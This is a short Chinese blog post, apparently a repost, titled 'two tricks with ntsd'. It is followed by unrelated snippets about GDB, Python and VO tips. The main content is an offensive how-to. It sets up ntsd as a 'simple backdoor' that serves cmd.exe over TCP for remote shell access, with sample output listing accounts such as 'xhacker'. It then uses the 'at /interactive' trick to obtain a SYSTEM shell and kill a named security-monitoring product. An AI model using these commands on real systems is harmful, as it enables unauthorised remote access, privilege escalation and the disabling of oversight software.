ntsd的兩個技巧

2021-09-01 05:35:14 字數 1141 閱讀 9560

分享一下我老師大神的人工智慧教程!零基礎,通俗易懂!

ntsd是win2000開始自帶的命令列除錯工具

一.簡易後門

ntsd -server tcp:port=22 cmd.exe

在另一台機上:

ntsd -remote tcp:server=192.168.1.33,port=22

.shell

結果:c:/><.shell waiting second for process>

<.shell process may need input>net user

net user

<.shell waiting second for process>

//x-4f5625db5b074 的使用者帳戶

——————————————————————————-

aaa                      administrator            guest

helpassistant            iusr_x-4f5625db5b074     iwam_x-4f5625db5b074

support_388945a0         xhacker

命令成功完成。

c:/><.shell waiting second for process>

<.shell process may need input>

二.殺程序

先用tasklist找到要殺的pid,然後ntsd -c q -p pid

有些程式需要system許可權才能kill,假設現在系統時間是4:55pm

「開始 「->  「執行 「->  「at   16:56   /interactive   %systemroot%/system32/cmd.exe 「-> 回車

這樣在4:56pm就會得到乙個system許可權的shell

在這個shell裡面使用ntsd命令把「北信源監控」的所有程序殺掉。

給我老師的人工智慧教程打call!

GDB的兩個技巧

分享兩個gdb的小技巧 1,gdb失效時手工得到stack 2,gdb執行使用者命令指令碼 除錯記憶體型服務程式的有時會遇到core dump或死鎖問題,且gdb或者pstack都無法顯示呼叫棧 call stack 這是因為執行緒的呼叫棧被破壞了,而呼叫棧存放了函式的返回位址,gdb解析函式返回位...

兩個 Python 的冷技巧

記得剛開始工作的時候,老大給我們上 c 基礎課,告訴我們字串字面量可以換行 如下 感覺真是如夢如幻。include int main int argc,char argv 輸出 hello world.後來在寫了很久的 python 以後,才知道 python 其實也可以的 t hello worl...

VO的兩個使用技巧

在as3中會經常使用vo 值物件 尤其是在cairngorm之類的框架中。下面是我在工作中使用vo而總結出的兩個使用技巧,與大家分享。一 可用遍歷方式賦值。如下面 package vo 如果vo的屬性與其它物件的屬性一一對應。在轉換時就可以用遍歷賦值。如下面 我們將xml屬性解析成vo屬性。var ...